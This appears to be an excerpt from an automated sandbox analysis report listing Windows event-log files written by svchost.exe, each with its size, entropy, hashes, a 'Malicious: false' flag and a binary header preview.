Preview:	ElfChnk.A.......C.......A.......C............$..h(....B......................................................................o.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................%..........**......A........+................&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9963080376858662
Encrypted:	false
SSDEEP:	384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
MD5:	A51AFE78FA4481FA05EDC1133C92B1D8
SHA1:	5BA44E7A99EE615E323696742DA6B930E9FF6198
SHA-256:	44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
SHA-512:	792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
Malicious:	false
Preview:	ElfChnk......................................)..0-....\.....................................................................\|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.076996627399968
Encrypted:	false
SSDEEP:	384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
MD5:	A8ADBDC2B39B55444B2C844F7D81EBDE
SHA1:	F97F40E314C8A2A39953A28CB72C9270D3073418
SHA-256:	93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
SHA-512:	922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
Malicious:	false
Preview:	ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.2250891068934284
Encrypted:	false
SSDEEP:	384:AhhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRG+:AhZxGp979
MD5:	81594443804852FF3B0ED97DCAD23086
SHA1:	89461C72D1BDF0DD0C33D39AA19AFE71F4560DDD
SHA-256:	6D6746BA193BE6707972B29F81E6C7490116A6380B1648069B6767279C18ADD2
SHA-512:	00617059A06DA3B67D81C1816AA8595B7EF5FF74AAE01BFB6878FAB2C2F7195078476F2D9E06F0C6E4F5429D6B865984D88888220CDD218C3981512DB34F2F6C
Malicious:	false
Preview:	ElfChnk.T...............T...................x...h...>.........................................................................)........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......T.......B..d..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.801423310886069
Encrypted:	false
SSDEEP:	384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
MD5:	9EAAD7982F42DFF47B8EF784DD2EE1CC
SHA1:	542608204AF6B709B06807E9466F7543C0F08818
SHA-256:	5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
SHA-512:	036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
Malicious:	false
Preview:	ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.996272372482282
Encrypted:	false
SSDEEP:	768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
MD5:	4F68D6AF0C7DB9E98F8B592C9A07811C
SHA1:	9F519109344DD57150F16B540AAA417483EF44FE
SHA-256:	44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
SHA-512:	E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
Malicious:	false
Preview:	ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	225200
Entropy (8bit):	4.066453136924067
Encrypted:	false
SSDEEP:	6144:Gz3Hsjz3Hl7z3Hsjz3HlCz3Hhkz3HoBz3Hliz3Hsjz3HlF:T
MD5:	E1041F89E7237CF396BC51745673960C
SHA1:	CDE39C6FB03B3CDDB5FE1DF622E6BBED19DE922F
SHA-256:	419EB9D42F9FD0EA70F1AEA168FC13A11E3A93CB59726D48C7C3E7FACA650CF4
SHA-512:	928011364578EC7213DB24B520E666361985ACD58129E99C340689EF889F266568308C6DE473EE551992AC69D98A7C1A14E7193C7E7B5C2BCBB6C2879AF53596
Malicious:	false
Preview:	ElfChnk......................................l...o.............................................................................................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F................................m..............................................................................&...................................**...7..........3.[...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.738218345404531
Encrypted:	false
SSDEEP:	384:th+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKns:tkN2cTOsKZ3VBC6fkx0NrjzDbRt
MD5:	5D8291232297E1ED686963634E7CDE28
SHA1:	6BC4FEC737F59F7A1D33BE2FD303649AB39FF16C
SHA-256:	97A174F4E97FCDDB9F72F4AE918D3842D9B87F76B699F1B07528C5ED4585512F
SHA-512:	92A52BCA3741FB0501A671F084BC7E4FD00CD14A9541ECE3B66B04B475CECA7780B25AEC8EC89AE7ABBFC2730E8E41F007736F4C74A8034B18D6CCF23C18079E
Malicious:	false
Preview:	ElfChnk.....................................0.......'........................................................................}..................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7590316238843728
Encrypted:	false
SSDEEP:	384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
MD5:	B074238315662886E2BD70106D08A747
SHA1:	5ADA158D19401565E76349FCA97489E9FB9BFA36
SHA-256:	53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
SHA-512:	9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
Malicious:	false
Preview:	ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.751171514678935
Encrypted:	false
SSDEEP:	1536:JXhjUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:JXNnS
MD5:	7DAF3CAACD8CC5D221CC69BD69F02E28
SHA1:	F22A6ED61CED6222505CEEEA421DE513FD5B2789
SHA-256:	5C36D10490BCD0E8632B33C624338497C513839C9DB52301B7B7491E5F46A7C5
SHA-512:	AB1B02E921052548DEE58D33500BE304B814431D9B5D2A54411F6BA750EACD1BF7D3A2FE24789C088E9C99C5F5CE00835CC149E60A70D7A3D4BCD38445AADC68
Malicious:	false
Preview:	ElfChnk.........%...............%............E..`G..........................................................................2..W................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3069197485541766
Encrypted:	false
SSDEEP:	768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
MD5:	E6E4C860CE7DD1BB499D6A082B461B90
SHA1:	11330861B23B1D29D777D9BD10619A07B6A6A9C0
SHA-256:	C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
SHA-512:	7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
Malicious:	false
Preview:	ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&........................................................................l..............]...................*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	127536
Entropy (8bit):	4.001386377404223
Encrypted:	false
SSDEEP:	768:ah0w+qLpBVi7CPME79nCxkSqah0w+qLpBVi7CPME79nCxkSqfS:c0w+qtBViL0w+qtBViQS
MD5:	1399E5ABAD3730403CA5A307F9E0E76F
SHA1:	01CBA55820252AC245A609FB74D5E418FC049730
SHA-256:	80EA47978D89E65019DF1FE03CB4519FBA275C322B93CCB5B173DB0D1464E0FD
SHA-512:	69336614AB5590EF04875C12E57A68773E1619AC41A176142D151B62550D6C5FBE75A12B836869F626E93AF540CD6F45A69CA5E0551B9B7131984FFEC5C4CFFE
Malicious:	false
Preview:	ElfChnk.........#...............#........... ..............................................................................\.f................T.......................\|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................*.. ............#................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.2909571978750325
Encrypted:	false
SSDEEP:	384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
MD5:	B0BF4D9EC91ABBDA5D328631B125A5C0
SHA1:	E672D69127AE7C1A51046ADAA911871EC0C10ABB
SHA-256:	8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
SHA-512:	3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
Malicious:	false
Preview:	ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.488768580471203
Encrypted:	false
SSDEEP:	1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
MD5:	E3FB1708C64D250E4D801AFB8688DF35
SHA1:	8B889F0358683733257411E451A86E3A1D42159D
SHA-256:	0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
SHA-512:	2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
Malicious:	false
Preview:	ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.499000073795324
Encrypted:	false
SSDEEP:	1536:scRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20G0:scRFkL1TWX0gkB/J7oasEfyk2/vKlqk8
MD5:	A884C6522E76DEF4D6EA5CCF0C78651C
SHA1:	7520B2BDC64C59F4FF502C54424E497ADB4CA033
SHA-256:	75A79BE6662A713096A649ACB26551E6F65B6C1249D94934ECB72740FD0F0879
SHA-512:	25F05C1DE7E2A96DCD63213EE4DA8219819CE0324DD297F52EF4081C1CB927C2F877D4E4E73354ACE97929A3083948F5DAB3EC7393A38634445BD252410D0B85
Malicious:	false
Preview:	ElfChnk.>...............>............................).....................................................................m..................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.494615007849227
Encrypted:	false
SSDEEP:	384:ekhN7s7o787l7r787a7J7z7+7N17g7V787g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7Z:ek93uCg
MD5:	A9648A7AB4FC0CFFF07E94D515D9AC8C
SHA1:	7042013D53F69AC353DC6B66D3B795D755FEC8F9
SHA-256:	52DCF7916572841107652C267B58D641E11214F371A815D076380E545CF2D07C
SHA-512:	5DC89970A93731FD2C858BA82A7413BC1DB6624F96693168B4163AFD64A61DDFF4B2F24CB79A2D078AC6F1F9ED982705A07C6054ADFB0047BB41DE59583E4B25
Malicious:	false
Preview:	ElfChnk.Y.......g.......Y.......g............%...&............................................................................S{............................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.1499045494600955
Encrypted:	false
SSDEEP:	384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
MD5:	2045FB0D54CA8F456B545859B9F9B0A8
SHA1:	35854F87588C367DE32A3931E01BC71535E3F400
SHA-256:	E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
SHA-512:	013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
Malicious:	false
Preview:	ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8164696340947971
Encrypted:	false
SSDEEP:	384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
MD5:	1AB19FA472669F4334C7A9D44E94E1B3
SHA1:	F71C16706CFA9930045C9A888FDB3EF46CACC5BC
SHA-256:	549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
SHA-512:	72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
Malicious:	false
Preview:	ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9855903635327656
Encrypted:	false
SSDEEP:	384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
MD5:	7BCA54AC75C7185ADFBB42B1A84F86E3
SHA1:	AD91EE55A6F9F77AD871ACA9A5B59987CA679968
SHA-256:	A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
SHA-512:	79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
Malicious:	false
Preview:	ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.165454452307923
Encrypted:	false
SSDEEP:	384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
MD5:	B6B6F199DA64422984403D7374F32528
SHA1:	980D66401DFCCF96ADDDAF22334A5CE735554E7F
SHA-256:	8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
SHA-512:	5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
Malicious:	false
